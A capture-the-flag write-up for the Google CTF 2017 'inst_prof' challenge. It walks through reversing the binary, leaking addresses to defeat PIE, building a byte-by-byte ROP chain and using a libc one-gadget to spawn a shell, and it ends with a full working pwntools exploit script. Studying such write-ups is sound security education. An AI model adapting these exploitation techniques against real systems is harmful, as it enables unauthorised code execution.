This will be a writeup for inst_prof from Google CTF 2017.
Please help test our new compiler micro-service
Challenge running at inst-prof.ctfcompetition.com:1337
I don’t know what inst_prof means, it might be instruction profiler? idk.
It was a pwn
challenge. The challenge was tricky yet simple. Lets start.
$ file inst_prof
inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped
$ checksec inst_prof
[*] '/home/payatu/Desktop/ctf/googlectf/pwn/inst_prof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Its not stripped and has partial RELRO+ NX + PIE.
Reversing
Since the binary is not stripped reversing it is easy. There are only 2 functions of interest.
int main(int argc, const char **argv, const char **envp)
{
if ( write(1, "initializing prof...", 0x14uLL) == 20 )
{
sleep(5u);
alarm(0x1Eu);
if ( write(1, "ready\n", 6uLL) == 6 )
{
while ( 1 )
do_test();
}
}
exit(0);
}
int do_test()
{
char *new_page;
unsigned __int64 time1;
unsigned __int64 time_delta;
new_page = alloc_page();
memcpy(new_page, template, sizeof(template))
read_inst(new_page + 5);
make_page_executable(new_page);
time1 = __rdtsc();
((void (__fastcall *)(_DWORD *))new_page)();
time_delta = __rdtsc() - time1;
if ( write(1, &time_delta, 8uLL) != 8 )
exit(0);
return free_page(new_page);
}
The flow is pretty simple. It calls do_test
in an infinite loop. What do_test
does is it’ll mmap() a page with PROT_READ|PROT_WRITE. Then it copies a predefined shellcode template
to the page. It looks like this.
As noticed template has 4 nops at offset 5, next it’ll read 4 bytes from stdin and write that to the page in read_inst
. The page is then marked executable using mprotect(). Then it uses rdtsc
instruction to read the current time-stamp counter. Then it jumps to the new page. On returning it again reads the time-stamp counter and finds the cycles passed which are dumped to stdout.
So we can have 4 bytes executed by the program 0x1000 times at once (unless we’re clever) and we have to get RCE.
Let’s now debug in gdb and find out how and what we control.
Just before jumping into the template
here’s what the context is.
Somethings to notice are,
- previous rdtsc is saved in r12
- r13 has an address belonging to stack
- rsp points to an address in do_test
Also I noticed during executions
- r$i{13,14,15} are preserved during the execution. r$i{8-12} are not preserved
Hunting for instructions
The constraint of 4 bytes is hard. pwntools
is a great tool which helps all aspect of exploitation. Looking around I searched on how we can control r$i registers in less than 4 bytes.
>>> from pwn import *
>>> context(arch='amd64', os='linux', log_level='info')
>>> asm("push rsp")
'T'
>>> asm("push r15")
'AR'
>>> asm("pop r15")
'AZ'
>>> asm("inc r15")
'I\xff\xc2'
>>> asm("dec r15")
'I\xff\xca'
Sweet! push
and pop
can be achieved in 2 bytes. inc
and dec
in 3 bytes. ret
is just a byte.
The binary has PIE, so the first thing we need is a leak to resolve the base address of the binary.
My first plan was to leak the $rip saved on the stack just before jumping to the template
.
>>> asm("pop r15;push r15")
'ZRAR'
This will copy the saved return address in to r15. We can then inc
or dec
r15 to jump anywhere in the binary by using push r15; ret
.
This gives us the power to call any offset in the binary, but it should have a safe return so that we don’t abruptly end the process.
Craft a leak
There are 2 candidates for a leak
- offset 868 : main+8 will leak 0x14 bytes to stdout
- offset 8a2 : main+42 will leak 0x6 bytes to stdout
First one will pass through sleep() and alarm() on return, which is not feasible. The second one is a good candidate to leak.
So the strategy is to execute the folowing code for leaking a stack addr:
pop r15; push r15
(get the saved return address)dec r15; ret
(decrease it to get to main+42)push rbp; pop rsi; push r15
(get [rbp] to leak which has a stack addr)
This will leak rsp+56
.
for leaking a saved instruction addr:
pop r15; push r15
(get the saved return address)dec r15; ret
(decrease it to get to main+42)push rsp; pop rsi; push r15
(get [rsp] to leak )
This will leak do_test+0x58
.
from pwn import *
context(arch='amd64', os='linux', log_level='info')
instruction_cache = {}
def cc_asm(ins):
if ins not in instruction_cache:
instruction_cache[ins] = asm(ins)
return instruction_cache[ins]
got_read = 2016
got_write = 1964
s = remote('127.0.0.1',5000)
raw_input()
s.recvline()
def execute(ins, get_response=True, count=8):
s.send(cc_asm(ins))
if get_response:
s.recv(count)
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
execute("dec r15; ret")
execute("push rbp; pop rsi; push r15", get_response=False)
leak_stack = u64(s.recv(6)+"\x00\x00")
print hex(leak_stack)
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
execute("dec r15; ret")
execute("push rsp; pop rsi; push r15", get_response=False)
leak_ip = u64(s.recv(6)+"\x00\x00")
print hex(leak_ip)
s.close()
This would help us defeat PIE by leaking base of the binary. With that we can write a ROP using gadgets from the binary. Since we don’t have a syscall
gadget we would have to use ret2libc or using alloc_page
and make_page_executable
we can jump to a shellcode. I spent a lot of time looking for proper gadgets to chain alloc_page
, read_n
and make_page_executable
. The problem was the return value of alloc_page
was in eax
and there were no proper gadgets to copy that value and continue execution.
Also I have observed in other CTFs that mmap when followed by munmap sometimes returns the same page. I tried having munmap to fail as we can control ebx during our shellcode execution. But I did not go deeper into this. So the only option left was ret2libc.
Exploit or GTFO!!
To pivot ROP chain into the memory there are not many candidates. One could be .data segment, other the stack. As we now have both addresses leaked we could go either way. I chose stack as I didn’t know how long could the ROP chain be.
To pivot the shellcode to the stack we can use instruction movb [r$i], byte
.
>>> asm("movb [r15], 0x1")
'A\xc6\x07\x01'
>>> len(asm("movb [r15], 0x1"))
4
>>> len(asm("movb [r14], 0x1"))
4
>>> len(asm("movb [r13], 0x1"))
5
r14
and r15
both do not change between execution and this way we could write to an address byte by byte.
The return address for do_test
frame is saved on the stack at rb8+8
. Since do_test
frame will change during calls I wrote a rop chain just after the return address of do_test
and then when I want to trigger it, I shrink the stack by 8 bytes using a pop
.
def write_and_execute_rop(rop):
execute("push rbp; pop r14; ret") # copy rbp to r14
for _ in xrange(16):
execute("inc r14; ret") # add 16 to r14 to get out of do_test's frame
for i in rop:
execute("movb [r14], %d" % ord(i)) # write one byte
execute("inc r14; ret") # increase
execute("pop rax; pop rbx; push rax; ret") # do an extra pop and shrink the stack by 8 bytes thus triggering the written rop chain.
Now we have an execution primitive. The first thing I do is I leak GOT[‘read’] and return execution to main(). Once we have leaked GOT value we can use libc-database
to find the libc’s version.
def leak_qword(addr):
rop = p64(binary_base + pop_rdi)
rop += p64(1) #stdout
rop += p64(binary_base + pop_rsi)
rop += p64(addr)
rop += "sudhakar"
rop += p64(binary_base + plt_write)
rop += p64(binary_base + 0x860)
write_and_execute_rop(rop)
return u64(s.recv(8))
leak_got_read = leak_qword(binary_base + got_read)
At the time of writing this writeup the service was down (Its up now!). So I wrote the exploit for local instance. For that.
$ ./find read 220
/lib/x86_64-linux-gnu/libc.so.6 (id local-14c22be9aa11316f89909e4237314e009da38883)
$ ./dump local-14c22be9aa11316f89909e4237314e009da38883
offset___libc_start_main_ret = 0x20830
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f7940
offset_read = 0x00000000000f7220
offset_write = 0x00000000000f7280
offset_str_bin_sh = 0x18cd17
This way I could find out the offset of any function in the libc and calculate their addresses in memory. The easiest way to get RCE would be to call system(“/bin/sh”) as we have offsets of both system and “/bin/sh” in libc.
Another option is to use one gadget RCE from libc. Using one-gadget
I found out such addresses.
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xcd0f3 execve("/bin/sh", rcx, r12)
constraints:
[rcx] == NULL || rcx == NULL
[r12] == NULL || r12 == NULL
0xcd1c8 execve("/bin/sh", rax, r12)
constraints:
[rax] == NULL || rax == NULL
[r12] == NULL || r12 == NULL
0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
0xf66c0 execve("/bin/sh", rcx, [rbp-0xf8])
constraints:
[rcx] == NULL || rcx == NULL
[[rbp-0xf8]] == NULL || [rbp-0xf8] == NULL
First one seems to be the easiest with shortest constraints. So for the final exploit
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
instruction_cache = {}
def cc_asm(ins):
if ins not in instruction_cache:
instruction_cache[ins] = asm(ins)
return instruction_cache[ins]
plt_read = 2016
plt_write = 1964
got_write = 2105368
got_read = 2105392
pop_rdi = 0x0000000000000bc3 # pop rdi ; ret
pop_rsi = 0x0000000000000bc1 # pop rsi ; pop r15 ; ret
'''
pwndbg> p read
$1 = {<text variable, no debug info>} 0xf7220 <read>
pwndbg> p write
$3 = {<text variable, no debug info>} 0xf7280 <write>
'''
libc_read = 0xf7220
libc_write = 0xf7280
s = remote('inst-prof.ctfcompetition.com', 1337)
s.recvline()
def execute(ins, get_response=True, count=8):
payload = cc_asm(ins)
assert(len(payload)<=4)
s.send(payload)
if get_response:
s.recv(count)
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
execute("dec r15; ret")
execute("push rbp; pop rsi; push r15", get_response=False)
leak_stack = u64(s.recv(6)+"\x00\x00")
# print hex(leak_stack)
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
execute("dec r15; ret")
execute("push rsp; pop rsi; push r15", get_response=False)
leak_ip = u64(s.recv(6)+"\x00\x00")
# print hex(leak_ip)
binary_base = leak_ip - 0x8a2
def leak_register(reg):
execute("pop r15; push r15")
execute("mov [rbp], {0}".format(reg))
for _ in xrange(0xb18 - 0x8a2):
execute("dec r15; ret")
execute("push rbp; pop rsi; push r15", get_response=False)
leak_reg = u64(s.recv(6)+"\x00\x00")
return leak_reg
def write_and_execute_rop(rop):
execute("push rbp; pop r14; ret")
# print "r14", hex(leak_register('r14'))
for _ in xrange(16):
execute("inc r14; ret")
for i in rop:
execute("movb [r14], %d" % ord(i))
execute("inc r14; ret")
# print "r14", hex(leak_register('r14'))
execute("pop rax; pop rbx; push rax; ret")
def leak_qword(addr):
rop = p64(binary_base + pop_rdi)
rop += p64(1) #stdout
rop += p64(binary_base + pop_rsi)
rop += p64(addr)
rop += "sudhakar"
rop += p64(binary_base + plt_write)
rop += p64(binary_base + 0x860)
write_and_execute_rop(rop)
return u64(s.recv(8))
leak_got_read = leak_qword(binary_base + got_read)
libc_base = leak_got_read - libc_read
print hex(leak_got_read)
one_gadget_rce = libc_base + 0x4526a
payload = p64(one_gadget_rce)
payload += p64(0)*10
write_and_execute_rop(payload)
s.interactive()
s.close()
This gives us a nice shell. w00t!
References:
- pwntools : Awesome framework with a ton of features for exploitation .
- pwndbg : GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.
- libc-database : libc database, you can add your own libc’s too.
- one-gadget : A tool to find one gadget RCE in libc.